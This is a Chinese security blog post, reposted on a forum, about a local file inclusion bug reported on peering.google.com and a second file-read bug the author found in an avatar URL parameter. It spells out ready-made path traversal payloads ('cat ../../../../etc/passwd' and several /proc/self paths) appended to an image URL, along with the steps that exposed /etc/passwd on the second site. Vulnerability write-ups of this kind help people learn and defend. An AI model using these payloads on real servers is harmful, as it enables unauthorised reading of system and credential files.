你是怎么想到要在 png 图片后加 cat 的?

admin 2020年9月18日18:13:45评论234 views字数 941阅读3分8秒阅读模式


你是怎么想到要在 png 图片后加 cat 的?

k同学这次是引用【peering.google.com中的本地文件包含】漏洞案例来分享,这是我在国外博客上看到的,正如标题所说"你tm是怎么想到在url图片后加cat的?"

1.攻击者获得有关服务器和内核数据的信息  PoC:“/proc/version”或“/proc/cpuinfo”或“proc/meminfo”)2.攻击者获取有关服务器上文件的信息。  PoC:“/proc/self/cmdline”)3.攻击者获取有关内部网络的信息。  PoC:”/proc/self/cmdline“)4.攻击者获得有关操作及其在服务器上运行时间的信息。  PoC:”proc/self/stat“)5.攻击者获得有关操作过程和系统能力的敏感信息,这些信息可以很好地衡量拒绝服务攻击的规模。  PoC:“/proc/self/status”)
https://peering.google.com/static/images/couch-ipad.png在链接末尾添加以下值之一:cat ../../../../../../../etc/passwdcat ../../. ./../../../../proc/self/cmdlinecat ../../../../../../../proc/self/stat/ cat ../../../../../../../proc /self/status
通过这种方式:https://peering.google.com/static/images/couch-ipad.png cat ../../../../../../../proc/self/cmdline

附漏洞作者的视频:


 【分割线】

这让我想起了我几年前在t00ls发过的一个文件包含漏洞

你是怎么想到要在 png 图片后加 cat 的?

头像地址:http://www.******.com/*********8?owner=1&person=1556935&defaultimg=/jsp/person/p_images/person-jlzx.gif

看到defaultimg参数就直觉告诉我能进行文件读取,于是换成根目录index.jsp,发现没任何反应....

你是怎么想到要在 png 图片后加 cat 的?

于是把前面的person参数值前面加个负号.....果然内容出来了

你是怎么想到要在 png 图片后加 cat 的?

接着/etc/passwd


你是怎么想到要在 png 图片后加 cat 的?

over


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月18日18:13:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   你是怎么想到要在 png 图片后加 cat 的?https://cn-sec.com/archives/137299.html

发表评论

匿名网友 填写信息